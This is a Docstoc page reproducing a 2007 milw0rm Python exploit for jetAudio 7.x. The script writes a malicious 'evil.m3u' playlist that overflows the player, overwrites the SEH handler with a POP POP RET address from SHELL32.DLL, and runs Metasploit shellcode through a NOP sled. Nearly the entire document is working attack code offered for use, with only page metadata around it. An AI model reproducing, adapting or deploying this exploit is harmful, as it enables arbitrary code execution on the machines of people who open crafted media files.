Docstoc

jetAudio 7.x m3u File Local SEH Overwrite Exploit

Document Sample
jetAudio 7.x m3u File Local SEH Overwrite Exploit Powered By Docstoc
					                                     jetAudio 7.x m3u File Local SEH Overwrite Exploit       Page 1/1
  1    #!/usr/bin/python
  2    # jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
  3    # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
  4    # Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
  5    # Shellcode: Windows Execute Command (calc) <metasploit.com>
  6    # Just for fun ;)
  7    ##
  8
  9    from struct import pack
  10
  11   m3u = ("#EXTM3U\nhttp://%s")
  12
  13   shellcode = (
  14   "\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
  15   "\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
  16   "\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
  17   "\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
  18   "\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
  19   "\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
  20   "\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
  21   "\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
  22   "\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
  23   "\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")
  24
  25   NEXT_SEH_RECORD = 0x909006EB            # JMP SHORT + 0x06
  26   SE_HANDLER = 0x7CEA61F7                 # POP POP RET (SHELL32.DLL / 2k SP4 Polish)
  27
  28   buf   = "CLICK ME"
  29   buf   += "\x20" * 1009
  30   buf   += pack("<L", NEXT_SEH_RECORD)
  31   buf   += pack("<L", SE_HANDLER)
  32   buf   += "\x90" * 128
  33   buf   += shellcode
  34
  35   m3u %= buf
  36
  37   fd = open("evil.m3u", "w")
  38   fd.write(m3u)
  39   fd.close()
  40
  41   print "DONE"
  42
  43   # EoF
  44
  45   # milw0rm.com [2007−10−14]




h07                                                                                          10/14/2007

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:24
posted:5/24/2010
language:Kurdish
pages:1